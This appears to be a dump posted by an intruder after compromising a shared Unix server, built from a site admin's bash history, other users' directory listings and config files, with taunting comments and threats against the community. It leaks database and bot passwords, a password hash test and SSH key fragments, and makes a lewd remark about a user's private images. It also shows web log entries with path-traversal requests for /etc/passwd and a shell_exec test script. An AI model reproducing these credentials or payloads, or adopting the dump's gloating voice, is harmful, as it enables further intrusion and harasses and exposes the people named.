-nano bcincludes/main.php
-nano bcincludes/defleft.php
-nano bcincludes/main.php
-nano FUDforum/thm/BC/tmpl/footer.tmpl
-nano FUDforum/thm/BC/tmpl/header.tmp
-nano public_html/scripts/lib.js.php
-nano public_html/themes/bc/main.css
-nano public_html/scripts/lib.js.php
-nano public_html/apps.php
-cd FUDforum/
-cd thm/BC/
-nano foum
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-tail /var/www/logs/error_log
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-grep -i "forum_info" tmpl/*
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-grep -i "forum_info" tmpl/*
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-grep -i msgr2 tmpl/*
-cd tmpl/
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-cd drawmsg.tmpl drawmsg.tmpl.bak
-cp drawmsg.tmpl drawmsg.tmpl.bak
-nano drawmsg.tmpl
-grep -i invisible *
-nano ../i18n/english/msg
-grep status_li *
-nano logedin.tmpl
-nano forum.css.tmpl
-grep 'GenText fb">Admin' *
-grep 'GenText fb' *
-grep 'GenText fb' * | grep admin
-nano admincp.tmpl
-nano forum.css.tmpl
-nano ~/public_html/themes/bc/main.css
-nano forum.css.tmpl
-nano ~/public_html/themes/bc/main.css
-grep post_reply *
-nano msg.tmpl
-nano msg.tmpl
-grep new_thread *
-nano msg.tmpl
-grep new_thread_link *
-nano thread_view_common.tmpl
-grep show_links *
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-nano thread_view_common.tmpl
-grep th_650 *
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-nano msg.tmpl
-grep th_650 *
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-grep new_t *
-nano msg.tmpl
-nano drawmsg.tmpl
-nano forum.css.tmpl
-nano ~/public_html/themes/bc/main.css
-grep '$user' *
-grep '$user' ../../../src/*
-nano forum.css.tmpl
-nano ../../../../public_html/apps.php
-nano forum.css.tmpl
-grep uc_buddy *
-nano forum.css.tmpl
-grep users_online *
-nano logedin.tmpl
-nano logedin.tmpl
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-grep reg_user *
-grep reg_user_op *
-nano forum.css.tmpl
-cd public_html/
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-nano themes/bc/main.css
-nano ../bcincludes/recent.php
-nano public_html/index.
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-nano public_html/themes/bc/main.css
-cd public_html/images/
-mkdir ficons
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-tail /var/www/logs/error_log
-nano bcincludes/irc.php
-nano bcincludes/top.php
-nano bcincludes/irc.php
-nano bcincludes/ads.php
-cd bcincludes/
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-mkdir ad/top
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-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-ls ad
-ls /var/www/users/bc/bcincludes/ad/top/
-ls /var/www/users/bc/bcincludes/ad/top/
-tail /var/www/logs/error_log
-ls -lh
-ls -lh ad/side
-ls -lh ad/side/
-ls -lh ad/top/
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-nano ../FUDforum/include/GLOBALS.php
-ls n
-nano mkurl.php
-mkdir cache
-tail /var/www/logs/error_log
-ls -lh /var/www/users/bc/bcincludes/ad/top/
-tail /var/www/logs/error_log
-ls -lha
-ls ad
-ls -lh ad
-ls -lh ad
-ls -lh ad/side
-ls -lh ad/side/
-ls -lh ad/top/
-nano public_html/index.php
-mv bcincludes/ad public_html/
-ls public_html/ad/
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-ls cgi-bin/
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-php -l user.php
-nano user.php
-php -l user.php
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-nano ../FUDforum/include/GLOBALS.php
-nano user.php
-cd ../bcincludes/
-nano ulast.php
-mysql -u fud -p fud
-cd public_html/
-nano test.php
-mysql -u fud -p fud
-nano test.php
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-nano ../bcincludes/main.php
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-cd public_html/apps
-mkdir bc-info
-nano ../../bcincludes/main.php
-tail /var/www/logs/error_log
-nano FUDforum/scripts/
-cd public_html/
-nano user.php
-php -l user.php
-nano user.php
-cp chat.php chat.old.php
-nano chat.php
-echo > chat.php
-nano chat.php
-php -l chat.php
-nano chat.php
-mysql -u harry -p hb_ng
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
-nano labs-old.php
-tail /var/www/logs/error_log
-tail /var/www/logs/error_log
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-nano FUDforum/thm/BC/tmpl/header.tmpl
-nano FUDforum/thm/BC/tmpl/forum.css.tmpl
-whois | less
-screen -rd
-cd public_html/
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-nano scripts/app_panel.js.php
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-nano apps.php
-nano scripts/app_config.php
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-nano apps.php
-cd apps
-nano milworm-rss.php
-cd FUDforum/scripts/
-nano rdf_parser.php
-mysql -u harry -p hb_ng
-cd public_html/cgi-bin/
-nano scan.cgi
-cd ..
-cd scan
-nano index.php
-nano scan.php
-tail /var/www/logs/error_log
-nano scan.php
-nano scan.php
-cd ../cgi-bin/
-nano test.cgi
-chmod +x test.cgi
-nano test.cgi
-mv test.cgi scan.cgi
-nano scan.cgi
-whereis nmap
-ls /usr/local/etc/
-cd /usr/local/
-ff nmap
-cd public_html/
-nano /usr/local/share/nmap/nmap-service
-nano /usr/local/share/nmap/nmap-services
-cd cgi-bin/
-nano scan.cgi
-nano /downloads/qmailrocks/qmail-scanner-1.25/contrib/qmail-scanner-queue.c
-nano nmap-runner.c
-man execv
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner --help
-nano nmap-runner.c
-./nmap-runner -sS
-./nmap-runner -sT
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-nano nmap-runner.c
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner --help
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner test
-./nmap-runner test 2
-nano nmap-runner.c
-./nmap-runner test 2
-./nmap-runner test 2
-nano nmap-runner.c
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner test 2
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner test 2
-man exec
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner test 2
-nano nmap-runner.c
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner test 2
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner ededf
-./nmap-runner --help
-gcc -o nmap-runner nmap-runner.c
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-./nmap-runner --help
-./nmap-runner -sV
-nano nmap-runner.c
-gcc -o nmap-runner nmap-runner.c
-nano scanjob.php
-grep /var/www/logs/access_log >
-source .bashrc
-screen -r
-cd FUDforum/thm/BC/tmpl
-nano actions.tmpl
-screen -r
-screen -rd
-mkdir chat
-cd bcincludes/
-cp main.php light.php
-nano light.php
-cd public_html/
-mkdir chat
-cd chat
-nano index.php
-screen -r
-screen -r
-cd FUDforum/
-cd thm/BC/
-cd tmpl
-nano ppost.tmpl
-cp ppost.tmpl ppost.tmpl.bak
-nano -w ppost.tmpl
-nano forum.css.tmpl
-nano -w ppost.tmpl
-grep file_ *
-nano post_common.tmpl
-nano -w ppost.tmpl
-nano post_common.tmpl
-nano -w ppost.tmpl
-nano -w ppost.tmpl
-grep fud_code_icons *
-nano post_common.tmpl
-nano smiley.tmpl
-grep GenText *
-grep GenText * | grep -v usrinfo
-nano -w ppost.tmpl
-grep MsgR3 *
-nano post_common.tmpl
-grep MsgR3 *
-nano -w ppost.tmpl
-cd ..
-cd i18n/english/
-nano msg
-nano -w msg
-tail /var/www/logs/error_log
-nano -w msg
-cd public_html/
-cp rules.php rules.bak.php
-nano rules.php
-nano newrules.php
-cd bcincludes/
-nano main.php
-cd public_html/apps
-nano forum-posts.php
-nano ../../bcincludes/recent
-nano ../../bcincludes/recent.php
-$ cat .ssh/known_hosts, ssh-rsa
-##keep your mouths shut or uplinklounge is next
-$ cat sql/query.php
-@mysql_connect(':/tmp/mysql.sock', 'fud', 'jdn52gj'); #eleet
-$q = "select count(id) from fud26_users";
-$r = mysql_query($q);
-$ cd /var/www/users/bcbot
-$ cat harry.conf
-#use ssl:// for ssl connections
-server =
-port = 6667
-#space-delimited list of channels
-channels = #uplinklounge #blackcode
-db_name = hb_ng
-db_user = harry
-db_pass = jdn52gj
-db_host = localhost
-nick = hb-mk3
-name = harry
-nickserv = jdn52gj
-notify_scripts =
-command_queue = /var/www/users/bcbot/command_queue
-msg_sleep = 1
-command_socket_bind =
-logmethod = mysql
-homedir = /home/bcbot
-$ cd /var/www/users/darkmalice
-$ ls -la
-total 36
-drwxr-xr-x 6 darkmalice darkmalice 512 Jan 26 23:32 .
-drwxr-xr-x 14 root daemon 512 Feb 26 16:40 ..
--rw------- 1 darkmalice darkmalice 245 Jan 25 20:27 .bash_history
--rwx------ 1 darkmalice darkmalice 549 Jan 25 18:56 .bashrc
-drwx------ 2 darkmalice darkmalice 512 Jan 25 19:00 .log
--rwx------ 1 darkmalice darkmalice 549 Jan 24 20:27 .profile
-drwxr-xr-x 2 darkmalice darkmalice 512 Jan 25 18:56 .ssh
-drwxr-xr-x 2 darkmalice darkmalice 512 Jan 27 00:18 C-Dev
-drwxr-xr-x 3 darkmalice darkmalice 512 Feb 12 04:07 public_html
-$ cd public_html
-$ cat test.php ##thats just excellent, secure and informative!
-echo shell_exec('whoami');
-$ cd /var/www/users/eweng
-$ ls -la
-total 32
-drwxr-xr-x 5 eweng eweng 512 Oct 3 2006 .
-drwxr-xr-x 14 root daemon 512 Feb 26 16:40 ..
--rw------- 1 eweng eweng 105 Aug 20 2006 .bash_history
--rw-r--r-- 1 eweng eweng 615 Aug 20 2006 .bashrc
--rw-r--r-- 1 eweng eweng 615 Aug 20 2006 .profile
-drwxr-xr-x 3 eweng eweng 512 Sep 28 2006 For Iadnah
-drwx------ 37 eweng eweng 1024 Aug 20 2006 SiteUpload
-drwxr-xr-x 3 eweng eweng 512 Oct 1 2006 public_html
-$ ls -la public_html
-total 47396
-drwxr-xr-x 3 eweng eweng 512 Oct 1 2006 .
-drwxr-xr-x 5 eweng eweng 512 Oct 3 2006 ..
--rw-r--r-- 1 eweng eweng 6129797 Oct 1 2006 LV.rar
--rw-r--r-- 1 eweng eweng 11438285 Oct 1 2006 PLV.rar
--rw-r--r-- 1 eweng eweng 3255358 Oct 1 2006 S1LV.rar
--rw-r--r-- 1 eweng eweng 2894417 Oct 1 2006 TLV.rar
--rwxrwxrwx 1 eweng eweng 5227 Aug 20 2006 catch.php
-drwxr-xr-x 2 eweng eweng 512 Aug 20 2006 cgi-bin
--rw-r--r-- 1 eweng eweng 34 Oct 1 2006 index.php
--rwxrwxrwx 1 eweng eweng 1006 Aug 20 2006 proxy.php
--rw-r--r-- 1 root eweng 30 Aug 20 2006 test.php
--rwxrwxrwx 1 eweng eweng 398268 Aug 20 2006 xanon.txt
-$ cd wiki
-$ ls -la
-total 108068
-drwxr-xr-x 5 wiki wiki 512 Feb 17 09:58 .
-drwxr-xr-x 14 root daemon 512 Feb 26 16:40 ..
--rw------- 1 wiki wiki 4437 Jun 18 2007 .bash_history
--rw------- 1 wiki wiki 389 Jun 18 2007 .mysql_history
--rw-r--r-- 1 root wiki 5353996 Nov 21 00:46 db.sql
-drwxr-xr-x 2 wiki wiki 1024 Nov 11 2006 mediawiki-1.8.2
--rw-r--r-- 1 wiki wiki 3491471 Oct 13 2006 mediawiki-1.8.2.tar.gz
-drwxr-xr-x 16 root wiki 1024 Feb 17 09:59 old
-drwxr-xr-x 3 wiki wiki 512 Feb 17 10:00 public_html
--rw-r--r-- 1 root wiki 46387200 Nov 21 00:47 public_html.tar
-$ cd vpopmail
-$ ls -la
-total 20964
-drwxr-xr-x 11 vpopmail vchkpw 512 Jan 4 2007 .
-drwxr-xr-x 14 root daemon 512 Feb 26 16:40 ..
--rw-r--r-- 1 root vchkpw 43 Aug 26 2006 .2782
--rw------- 1 vpopmail vchkpw 2560 Jan 4 2007 .bash_history
-drwx------ 2 vpopmail vchkpw 512 Aug 28 2006 .gnupg
--rw------- 1 vpopmail vchkpw 1222 Jan 4 2007 .mysql_history
-drwx------ 2 vpopmail vchkpw 512 Jul 13 2007 .spamassassin
--rw------- 1 vpopmail vchkpw 4 Sep 4 2006 asshat.log ## echo iadnah
->> asshat.log
--rw-r--r-- 1 vpopmail vchkpw 0 Jan 4 2007 badhosts
-drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 bin
-drwxr-xr-x 4 vpopmail vchkpw 512 Aug 26 2006 doc
-drwx------ 3 vpopmail vchkpw 512 Aug 26 2006 domains
-drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 etc
--rw-r--r-- 1 root vchkpw 302 Jan 4 2007 hourly.php
--rw------- 1 vpopmail vchkpw 45507 Sep 5 2006 iadnah.log
-drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 include
-drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 lib
--rwxr-xr-x 1 vpopmail vchkpw 83 Sep 4 2006
-drwxr-xr-x 5 vpopmail vchkpw 512 Sep 3 2006 public_html
--rwxr-xr-x 1 root vchkpw 3413 Aug 27 2006 qtrap-2.0.0
--rwxr-x--- 1 vpopmail vchkpw 1059 Sep 3 2006
--rw-r--r-- 1 vpopmail vchkpw 2661535 Sep 3 2006 senderlog.log
--rwxr-x--- 1 root vchkpw 2874 Aug 27 2006 spamscan.php
--rwxr-xr-x 1 vpopmail vchkpw 1408 Jan 4 2007 test.php
--rwxr-x--- 1 vpopmail vchkpw 129 Sep 4 2006
--rw------- 1 vpopmail vchkpw 7914224 Jan 13 2007 vars
--rw-r--r-- 1 vpopmail vchkpw 67 Aug 22 2006 vqadmin.passwd
-$ cat vqadmin.passwd
-$ cd /home
-$ ls -la
-total 56
-drwxr-xr-x 14 root wheel 512 Feb 26 10:16 .
-drwxr-xr-x 23 root wheel 1024 Apr 7 12:17 ..
-drwxr-xr-x 3 iadnah iadnah 512 Aug 20 2007 backup
-lrwxr-xr-x 1 root wheel 17 Nov 7 2006 bc ->
-lrwxr-xr-x 1 root wheel 20 Nov 7 2006 bcbot ->
-drwxr-xr-x 21 bridge bridge 1024 Feb 17 10:05 bridge
-lrwxr-xr-x 1 root wheel 25 Jan 24 20:25 darkmalice ->
-drwxr-xr-x 6 devel devel 512 Dec 18 20:03 dev
-lrwxr-xr-x 1 root wheel 21 Feb 26 10:14 eweng ->
-lrwxr-xr-x 1 root wheel 27 Feb 26 10:14 harrybotter ->
-drwxr-xr-x 16 iadnah iadnah 1536 Apr 4 09:02 iadnah
-drwxr-xr-x 6 lloth lloth 512 Feb 12 08:33 lloth
-drwxr-xr-x 4 logger logger 512 Nov 27 2006 logger
-lrwxr-xr-x 1 root wheel 22 Feb 26 10:15 mdfive ->
-drwxr-xr-x 6 myrmidon666 myrmidon666 512 Feb 7 13:39 myrmidon666
-drwxr-xr-x 2 origin origin 512 Jan 26 16:26 origin
-lrwxr-xr-x 1 root wheel 19 Nov 7 2006 phox ->
-drwxr-xr-x 2 qscand qscand 512 Oct 11 2006 qscand
-drwxr-xr-x 8 silcbot silcbot 512 Aug 20 2007 silcbot
-lrwxr-xr-x 1 root wheel 15 Feb 26 10:16 users ->
-lrwxr-xr-x 1 root wheel 23 Nov 7 2006 vpopmail ->
-drwxr-xr-x 6 wiki wiki 512 Oct 24 2006 wiki
-drwxr-xr-x 2 x x 512 Aug 7 2006 x
-$ ls -la backup
-total 7414380
-drwxr-xr-x 3 iadnah iadnah 512 Aug 20 2007 .
-drwxr-xr-x 14 root wheel 512 Feb 26 10:16 ..
-drwxr-xr-x 9 iadnah iadnah 512 Aug 16 2007 bc
--rw-r--r-- 1 iadnah iadnah 1071779840 Aug 17 2007 bc.tar
--rw-r--r-- 1 iadnah iadnah 9195520 Aug 17 2007 etc.tar
--rw-r--r-- 1 iadnah iadnah 965959680 Aug 17 2007 home.tar
--rw-r--r-- 1 iadnah iadnah 1308293120 Aug 17 2007 iadnah.tar
--rw-r--r-- 1 iadnah iadnah 11223040 Aug 17 2007 log.tar
--rw-r--r-- 1 iadnah iadnah 5068800 Aug 17 2007 silc.tar
--rw-r--r-- 1 iadnah iadnah 360314880 Aug 17 2007 sql.tar
--rw-r--r-- 1 iadnah iadnah 14028800 Aug 17 2007 wiki.tar
--rw-r--r-- 1 iadnah iadnah 49141760 Aug 17 2007 wiki2.tar
-$ ls -la iadnah
-total 933148
-drwxr-xr-x 16 iadnah iadnah 1536 Apr 4 09:02 .
-drwxr-xr-x 14 root wheel 512 Feb 26 10:16 ..
-drwx------ 3 iadnah iadnah 512 Oct 11 2006 .BitchX
--rw-r--r-- 1 iadnah iadnah 0 Oct 6 2006 .addressbook
--rw------- 1 iadnah iadnah 2285 Oct 6 2006
--rw------- 1 iadnah iadnah 7013 Apr 7 02:07 .bash_history
--rw-r--r-- 1 iadnah iadnah 616 Aug 2 2006 .bashrc
-drwxr-xr-x 2 iadnah iadnah 512 Aug 19 2007 .bin
-drwxr-xr-x 2 iadnah iadnah 512 Aug 19 2007 .log
--rw-r--r-- 1 iadnah iadnah 317 Mar 2 2006 .login
--rw-r--r-- 1 iadnah iadnah 105 Mar 2 2006 .mailrc
--rw------- 1 iadnah iadnah 3135 Dec 11 20:38 .mysql_history
--rw------- 1 iadnah iadnah 17542 Nov 6 2006 .pine-debug1
--rw------- 1 iadnah iadnah 17499 Nov 6 2006 .pine-debug2
--rw------- 1 iadnah iadnah 17217 Nov 6 2006 .pinerc
-drwxr-xr-x 2 iadnah iadnah 512 May 30 2007 .ssh
-drwxr-xr-x 3 iadnah iadnah 512 Dec 19 21:52 .subversion
--rw-r--r-- 1 iadnah iadnah 262144 Aug 25 2007 404.log
--rw-r--r-- 1 iadnah iadnah 2916352 Apr 4 07:54 Maya8.5.iso
-drwx------ 37 iadnah iadnah 1024 Jun 3 2007 SiteUpload
--rw-r--r-- 1 iadnah iadnah 526749 Aug 20 2007 acct.gz
--rw-r--r-- 1 iadnah iadnah 1356 Mar 25 21:22 arab.txt
--rw-r--r-- 1 iadnah iadnah 3332 Mar 26 17:39 attacker
--rw-r--r-- 1 iadnah iadnah 3491 Sep 3 2006 bc.png
--rw-r--r-- 1 iadnah iadnah 11489 Aug 12 2006 bc_bot.sql
--rw-r--r-- 1 iadnah iadnah 131 Sep 17 2007 biotraineeship.txt
--rw-r--r-- 1 iadnah iadnah 254 Oct 19 2007 crypt.php
--rw-r--r-- 1 iadnah wheel 1756972 Mar 25 20:33 etterlog.pcap
--rw-r--r-- 1 iadnah iadnah 967 Mar 26 17:26 fuckers
--rw-r--r-- 1 iadnah iadnah 8569 Sep 19 2007
-drwxr-xr-x 2 iadnah iadnah 512 Dec 12 00:02 hb-ng
--rw-r--r-- 1 iadnah iadnah 1042 Feb 24 18:53
--rwxr-xr-x 1 iadnah iadnah 401 Feb 5 20:06
--rw-r--r-- 1 iadnah iadnah 391683 May 30 2007 img.tar.gz ##ewwww his
-moms nudes
--rw-r--r-- 1 iadnah iadnah 12905 Aug 12 2006 info
--rw-r--r-- 1 iadnah users 105000960 Sep 28 2006 intel.tar
--rw-r--r-- 1 iadnah iadnah 14940925 Jun 20 2007 ip
--rw-r--r-- 1 iadnah iadnah 226968 Jun 20 2007 iplist
--rwxr-xr-x 1 iadnah iadnah 5864 Aug 6 2006 jack.php
--rw-r--r-- 1 iadnah iadnah 6507478 Jun 20 2007 jun.log.bz2
--rw-r--r-- 1 iadnah iadnah 940 Jun 20 2007 log.php
--rw-r--r-- 1 root wheel 19306021 Aug 19 2007 log2.pcap.gz
--rw-r--r-- 1 iadnah iadnah 1431 Sep 20 2006 lost
-drwx------ 2 iadnah iadnah 512 Nov 6 2006 mail
--rw-r--r-- 1 iadnah iadnah 311838720 Feb 2 15:20 maya.tar
--rw-r--r-- 1 iadnah iadnah 40022 May 30 2007 menuBkgd.jpg
--rw-r----- 1 iadnah iadnah 2995 Apr 24 2007 named.conf
--rwxr-xr-x 1 root iadnah 225 Aug 22 2006 netstat_parse.php
-drwxr-xr-x 10 iadnah iadnah 3072 Nov 29 15:42 nmap-4.20
-drwxr-xr-x 2 iadnah iadnah 512 May 31 2007 pack
--rw-r--r-- 1 iadnah iadnah 1801521 Mar 25 19:40 packetlog.dump
--rw-r--r-- 1 root iadnah 400524 Nov 30 06:31 perl.log
--rw-r--r-- 1 iadnah iadnah 3631433 Mar 26 17:12 pjirc.log
-drwxr-xr-x 4 iadnah iadnah 512 Jun 20 2007 public_html
--rw-r--r-- 1 iadnah iadnah 1042 Dec 19 02:39 rkhunter-1.3.0_obsd.patch
--rwxr-xr-x 1 iadnah iadnah 835 Aug 28 2006 sentral.php
--rw-r--r-- 1 root iadnah 2058 Aug 22 2006 spam
--rw-r--r-- 1 root iadnah 1529 Dec 7 2006 spammers
-drwxr-xr-x 15 iadnah iadnah 4096 Mar 6 2007 ssh
-drwxr-xr-x 2 iadnah iadnah 512 May 30 2007 stuff
--rw-r--r-- 1 iadnah iadnah 6942720 May 30 2007 stuff.tar
-drwxr-xr-x 4 iadnah iadnah 512 Dec 19 22:10 test
--rw-r--r-- 1 iadnah iadnah 35035 Aug 6 2006 test.html
--rw-r--r-- 1 iadnah iadnah 37 Aug 30 2006 test.php
--rw-r--r-- 1 iadnah iadnah 557056 Feb 28 19:01 thing.iso
--rw-r--r-- 1 iadnah iadnah 1017 Sep 1 2006 top_bar.jpg
--rw-r--r-- 1 iadnah iadnah 10597 Sep 1 2006 top_main.jpg
-$ cat fuckers ##if they are fuckers, what are we :0...and what are you? 0wned. - - [25/Mar/2008:22:01:17 -0400] "GET
-ab.txt? HTTP/1.1" 404 320 "-"
-"libwww-perl/5.808" - - [26/Mar/2008:07:12:54 -0400] "GET
-/pjirc//irc.php?phpEx= HTTP/1.1"
-404 320 "-" "libwww-perl/5.808" - - [26/Mar/2008:07:40:26 -0400] "GET
-? HTTP/1.1" 404 - "-"
-"libwww-perl/5.808" - - [26/Mar/2008:16:56:32 -0400] "GET
-/pjirc/index.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 5863 "-"
-"Mozilla/5.0 (X11; U; Linux i686; en-US;
-rv: Gecko/20080302 Firefox/" - - [26/Mar/2008:16:56:33 -0400] "GET
-/pjirc/index.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 5863 "-"
-$ cat .ssh/*
-root@acolyte, ssh-rsa
-vP97By6SsUjmWrOdKFZkRri1+bYsofCupNSE04fX8=, ssh-rsa
-$ cat
-$ cat /home/silcbot/.bash_history
-ls -lh
-ls -lh Maildir/
-ls -lh Maildir/*
-rm -Rf Maildir/
-silc --connect localhost
-cd .sil
-cd .silc/
-mkdir scriptsa
-mv scriptsa/ scripts
-cd scripts/
-silc --connect
-cd .silc/
-nano silc.conf
-nano silc.conf
-nano .silc/silc.conf
-nano .silc/silc.conf
-nano .silc/silc.conf
-rm silc.core
-ulimit -h
-ls .silc/
-mv .silc/silc.conf .silc/silc.conf.bak
-nano .silc/silc.conf
-ls -lh /var/run/
-netstat | grep mysel
-netstat | grep mysql
-netstat -n | grep mysql
-ln -s /tmp/mysql.sock /var/run/mysql/mysql.sock
-rm silc.core
-screen silc
-ls logs/
-ls logs
-tail logs/chatlog
-tail logs/userlog
-ls logs
-tail logs/nicklog
-cd .silc/
-nano scripts/
-ls -lh
-screen -x
-screen -x
-screen -x
-screen -r
-ls -l
-cd silcbot
-cd silcbot
-ls -l
-cd .
-cd ..
-ls -l
-cd silcbot
-ls -h
-ls -help
-ls -help
-ls -g
-nano /home/silcbot/.silc/scripts/
-cd .silc/scripts/
-mkdir ~/channels/uplinklounge
-mkdir -p ~/channels/uplinklounge
-mkdir -p ~/channels/blackcode
-cd .silc/scripts/
-ls ../friends/
-ls ../
-ls ../clientkeys/
-ls ../
-ls ../friends/
-tail logs/nicklog
-tail logs/chatlog
-tail logs/chatlog
-tail logs/chatlog
-tail logs/chatlog
-cd .silc/scripts/
-ps ax
-nano passwd
-cd .silc/scripts/
-ls ../../
-ls ../../channels/
-ls ../../channels/blackcode/
-ls ../../channels/uplinklounge/
-mkdir users
-cd users/
-nano iadnah
-nano .silc/scripts/
-nano .silc/scripts/
-nano ~/passwd
-nano .silc/scripts/
-nano ~/passwd
-nano .silc/scripts/
-screen -r
-screen silc
-cd .silc/scripts/
-ls channels/
-ls channels/blackcode/
-screen -r
-nano .silc/scripts/
-ls logs/
-tail logs/userlog
-nano .silc/scripts/
-ls channels/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-ls logs/userlog
-tail logs/userlog
-nano .silc/scripts/
-ls channels/
-ls channels/blackcode/
-ls channels/blackcode/
-rm channels/*/*
-ls channels/
-ls channels/blackcode/
-ls channels/blackcode/iadnah
-ls channels/blackcode/
-touch channels/*/harry_botter
-touch channels/blackcode/harry_botter
-touch channels/uplinklounge/harry_botter
-ls channels/
-ls channels/blackcode/
-rm channels/*/*
-ls channels/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-ls channels/blackcode/
-screen -r
-whereis bash
-chmod +x
-chmod +x
-./ | sed -e "s/\n/,/g"
-./ | sed -e "s/$/,/g"
-./ | sed -e "s/\n$/,/g"
-./ | sed -e "s/$/,/g"
-php silc
-ls /
-ls -lh /
-cd users/
-cd ..
-nano passwd
-ls -lh
-chmod 500 passwd
-ls -lh
-chmod 600 passwd
-ls -lh
-nano passwd
-screen 0r
-screen -r
-echo -n "7h0mp50n" | md5sum ## I must say, that is quite hilarious, even by your
-echo -n "7h0mp50n" | md5
-nano passwd
-cd .silc/
-screen -r
-nano scripts/
-wc -l scripts/
-nano scripts/
-$ ls -la /home/lloth/
-total 174808
-drwxr-xr-x 3 lloth lloth 1024 Mar 2 22:53 .
-drwxr-xr-x 6 lloth lloth 512 Feb 12 08:33 ..
--rw-r--r-- 1 lloth lloth 4967707 Feb 1 13:41 02 oxford comma.mp3
--rw-r--r-- 1 lloth lloth 64291622 Oct 18 2007
--rw-r--r-- 1 lloth lloth 2513877 Apr 9 2007 Bodyrox ft. Luciana - Yeah
--rw-r--r-- 1 lloth lloth 4939904 Nov 2 09:29 Mindless Self Indulgence -
-Shut Me Up.mp3
--rw-r--r-- 1 lloth lloth 779392 Mar 20 2006 Owned.mp3
--rw-r--r-- 1 lloth lloth 3139675 Jun 6 2004 Pennywise - Fuck
--rw-r--r-- 1 lloth lloth 222252 Oct 14 2004 a-bassy(BC-dis).mp3
--rw-r--r-- 1 lloth lloth 2063045 Feb 10 14:39 asdf.mp3
--rw-r--r-- 1 lloth lloth 1640906 Dec 1 2004 bc-dis.mp3
--rw-r--r-- 1 lloth lloth 685351 Nov 8 2004 bondLOOP2.mp3
-drwxr-xr-x 2 lloth lloth 1024 Feb 25 01:52 forewen
--rw-r--r-- 1 lloth lloth 2349 Aug 21 2007 index.html
--rw-r--r-- 1 lloth lloth 5123 Aug 15 2007 md5eweng.txt
--rw-r--r-- 1 lloth lloth 765181 Dec 1 2004 mylife.mp3
--rw-r--r-- 1 lloth lloth 234582 Oct 22 2004 servermurder.mp3
--rw-r--r-- 1 lloth lloth 5734 Feb 10 19:11 t.c
--rw-r--r-- 1 lloth lloth 441822 Oct 5 1999
--rw-r--r-- 1 lloth lloth 2403372 Oct 11 2007 wtf.mp3
--rw-r--r-- 1 lloth lloth 36158 Aug 17 2007 zf0investigate.htm ##h0ly
-c0w! what is diz !
--rw-r--r-- 1 lloth lloth 18370 Aug 20 2007 zf0logs.txt ##OH NO, THEY
-D3T3ct3d uS!
-$ head -n 10 zf0investigate.htm
-<html xmlns="" xml:lang="en"><head><meta
-http-equiv="Content-Type" content="text/html;
-<!-- base
-ds/" --><title> -
-Social Networking For The Digitially Unhinged</title><meta
-http-equiv="Content-Language" content="en-gb"><meta
-http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta
-name="keywords" content="uk underground
-hacking internet computer infosec security news independent articles white
-papers hacker hack hacking how-to learn wifi
-underground cracking forums cracker, Security, Forums, computers, PC, Exploits,, Anonymity, Privacy,
-Spam, Linux, UNIX, Networking, Programming, Firewalls, Routers, Gateway,
-Windows, Connectivity, Telecommunications,
-Reviews, Cryptography, spyware"><meta name="description" content="The Whitedust
-Security Portal is an attempt to bring
-back the now forgotten way to repaying the community by putting material of
-interest back into it. While many diverse
-sources of security news and articles are available on the internet, few of
-those sources are specifically targetted at
-the security community and none of them are unbiased."><meta name="author"
-content="Whitedust Security"><link
-rel="stylesheet" href="zf0%20investigate_files/1.htm" type="text/css"
-border="1" width="100%"><tbody><tr><td><table color="#ffffff" bgcolor="#ffffff"
-border="1" cellpadding="10"
-cellspacing="0" width="100%"><tbody><tr><td><font color="black" face=""
-size="-1">This is <b><font
-color="#0039b6">G</font> <font color="#c41200">o</font> <font
-color="#f3c518">o</font> <font color="#0039b6">g</font>
-<font color="#30a72f">l</font> <font color="#c41200">e</font></b>'s <a
-color="blue">cache</font></a> of <a
-st_Awards/</font></a> as retrieved on
-Aug 10, 2007 00:35:35 GMT.<br>
-<b><font color="#0039b6">G</font> <font color="#c41200">o</font> <font
-color="#f3c518">o</font> <font
-color="#0039b6">g</font> <font color="#30a72f">l</font> <font
-color="#c41200">e</font></b>'s cache is the snapshot that
-we took of the page as we crawled the web.<br>
-The page may have changed since that time. Click here for the <a
-ds/"><font color="blue">current
-page</font></a> without highlighting.<br>
-This cached page may reference images which are no longer available. Click here
-for the <a
-color="blue">cached text</font></a> only.<br>To link to or bookmark this page,
-use the following url:
-size="-2"><i>Google is neither affiliated with the authors of this page nor
-responsible for its
-<table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td><font
-color="black" face="" size="-1">These search
-terms have been highlighted:&nbsp;</font></td><td bgcolor="#ffff66"><b><font
-color="black" face=""
-size="-1">ilite&nbsp;</font></b></td><td bgcolor="#a0ffff"><b><font
-color="black" face=""
